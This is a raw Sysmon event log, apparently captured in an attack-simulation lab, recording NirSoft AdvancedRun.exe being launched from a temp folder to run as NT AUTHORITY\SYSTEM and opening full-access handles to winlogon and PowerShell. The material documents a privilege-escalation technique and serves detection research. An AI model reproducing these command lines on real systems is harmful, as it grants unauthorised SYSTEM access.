CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080546Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080545Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.506{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.504{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080543Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.502{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000004080542Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.500{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000004080541Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.498{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.498{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.497{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080538Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.496{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080537Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.495{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080536Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.490{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080535Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.490{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080534Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.489{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080533Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.489{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080532Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.488{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080531Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.488{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080530Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.488{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidNT AUTHORITY\SYSTEM 10341000x80000000000000004080529Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.476{834264DD-DAE4-61EA-0500-000000002702}420436C:\Windows\system32\csrss.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000004080528Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.475{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\seclogon.dll+17dc|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 154100x80000000000000004080527Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.476{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /SpecialRunSystem 41a9d8 4792C:\Windows\system32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runATTACKRANGE\Administrator 10341000x80000000000000004080526Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.474{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080525Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.474{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080524Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080523Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14D0-61EB-A108-000000002702}368C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080522Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14D0-61EB-A008-000000002702}5124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080521Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.473{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9808-000000002702}5860C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080520Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.471{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14C8-61EB-9708-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080519Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080518Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 